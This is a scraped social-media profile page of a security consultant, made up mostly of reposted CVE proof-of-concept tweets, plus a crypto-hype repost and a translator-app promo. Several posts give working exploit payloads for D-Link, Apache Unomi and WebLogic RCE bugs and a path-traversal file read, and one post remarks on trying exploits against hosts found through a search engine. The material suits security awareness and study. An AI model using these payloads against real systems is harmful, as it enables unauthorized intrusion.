@0xyuhao Profile picture

Yuan-chi

@0xyuhao

PwC/Cybersecurity/Cloud Security/Senior Consultant/Security Services Engineer/Security Research/SOC (Security Operations Center)/Incident Response/Pentest

Joined June 2019
Similar User
苏安 photo

@suanve

key photo

@VulkeyChen

CX photo

@cxaqhq

Skay photo

@Skay_00

曾哥 photo

@AabyssZG

夏 evi1_f4iry Xena photo

@evi1_f4iry

adventurer_coin photo

@luck_hacking

T4rn photo

@tttt4rn

Phith0n photo

@phithon_xg

雨苁-www.ddosi.org photo

@gov_hack

Blackhold photo

@90security

drivertom photo

@drivertomtt

Erdon photo

@Erdon_CN

晏子霜 photo

@YanZiShuang

WgpSec photo

@wgpsec

Yuan-chi Reposted

Elon Musk meşhur $DOGE paylaşımını tekrar yaptı🚀🚀🚀 2020 yılında bu paylaşımı yaptıktan sonra DOGECOİN 200X yapmıştı 🔥🔥 #DOGE #SHIB #FLOKI #BabyDoge

mucocoin55's tweet image. Elon Musk meşhur $DOGE paylaşımını tekrar yaptı🚀🚀🚀

2020 yılında bu paylaşımı yaptıktan sonra  DOGECOİN 200X yapmıştı 🔥🔥

#DOGE #SHIB #FLOKI #BabyDoge

Yuan-chi Reposted

您的跨平台桌面端应用 —— OpenAI Translator 已准备就绪! github.com/yetone/openai-…

yetone's tweet image. 您的跨平台桌面端应用 —— OpenAI Translator 已准备就绪!

github.com/yetone/openai-…
yetone's tweet image. 您的跨平台桌面端应用 —— OpenAI Translator 已准备就绪!

github.com/yetone/openai-…
yetone's tweet image. 您的跨平台桌面端应用 —— OpenAI Translator 已准备就绪!

github.com/yetone/openai-…

重磅更新!现在 ChatGPT 划词翻译浏览器插件已经支持三种翻译模式:翻译、润色、总结。 希望大家喜欢! github.com/yetone/openai-…



Yuan-chi Reposted

CVE-2022-36804 PoC 🧐 anquanke.com/post/id/280193

testanull's tweet image. CVE-2022-36804 PoC 🧐
anquanke.com/post/id/280193

企业安全的解决方案是什么?

0xyuhao's tweet image. 企业安全的解决方案是什么?

假装参赛

AND IT'S OVER!!!!!! PPP 🥇 wins @DEFCON 29 Qualifiers, with Katzebin 🥈 and Tea Deliverers 🥉 right behind! Thank you all for pushing hard. GREAT JOB and HACK THE PLANET!!!!!

oooverflow's tweet image. AND IT'S OVER!!!!!! PPP 🥇 wins @DEFCON 29 Qualifiers, with Katzebin 🥈 and Tea Deliverers 🥉 right behind! Thank you all for pushing hard. GREAT JOB and HACK THE PLANET!!!!!


扎心了!

0xyuhao's tweet image. 扎心了!

Yuan-chi Reposted

D-Link DSL-2888A AU_2.31_V1.1.47ae55 RCE (CVE-2020-24581) D-link DSL-2888A is a unified service router of China D-link company PoC http:/xxx/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=uname -a reconshell.com/cve-2020-24581…

wugeej's tweet image. D-Link DSL-2888A AU_2.31_V1.1.47ae55 RCE (CVE-2020-24581)

D-link DSL-2888A is a unified service router of China D-link company

PoC
http:/xxx/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=uname -a

reconshell.com/cve-2020-24581…

cve-2021-3156,有一个新的sudo漏洞,基本上现有的Linux在普通用户情况上,都可以提升权限到root blog.qualys.com/vulnerabilitie… qualys.com/2021/01/26/cve…

0xyuhao's tweet image. cve-2021-3156,有一个新的sudo漏洞,基本上现有的Linux在普通用户情况上,都可以提升权限到root
blog.qualys.com/vulnerabilitie…
qualys.com/2021/01/26/cve…

提问: go web的网站在rce的情况下如何好的getshell


Yuan-chi Reposted

#CVE-2020-13942 Apache Unomi Remote Code Execution PoC: {"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}


学校 政府 小区 社区 交通部门 卫生部门其实都通过大数据防疫,但是过度搜集信息后也为黑产提供了方便之门。 吐槽一下 最近证劵电话真是打个不停,年底冲业绩了吧

提个醒。因为疫情,社区、政府机构、公司等收集了大量详细的个人信息。如何防止这些信息再次被滥用是个问题。



CVE-2020-14882+CVE-2020-14883 未授权访问rce fofa上随便找了几个试了试,基本都可以。

#CVE-2020–14882 Weblogic Unauthorized bypass RCE http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) testbnull.medium.com/weblogic-rce-b…

jas502n's tweet image. #CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)

testbnull.medium.com/weblogic-rce-b…
jas502n's tweet image. #CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)

testbnull.medium.com/weblogic-rce-b…
jas502n's tweet image. #CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)

testbnull.medium.com/weblogic-rce-b…


估计版本是6.0-6.5之间都有影响,先升级7吧!

eam/vib and eam/vibd as well jas502n.com/eam/vibd?id=C:\windows\win.ini

jas502n's tweet image. eam/vib and eam/vibd as well

jas502n.com/eam/vibd?id=C:\windows\win.ini
jas502n's tweet image. eam/vib and eam/vibd as well

jas502n.com/eam/vibd?id=C:\windows\win.ini


Yuan-chi Reposted

Docker for Pentester: Image Vulnerability Assessment hackingarticles.in/docker-for-pen… #Docker #pentest #infosec

hackinarticles's tweet image. Docker for Pentester: Image Vulnerability Assessment

hackingarticles.in/docker-for-pen…

#Docker  #pentest #infosec

Loading...

Something went wrong.


Something went wrong.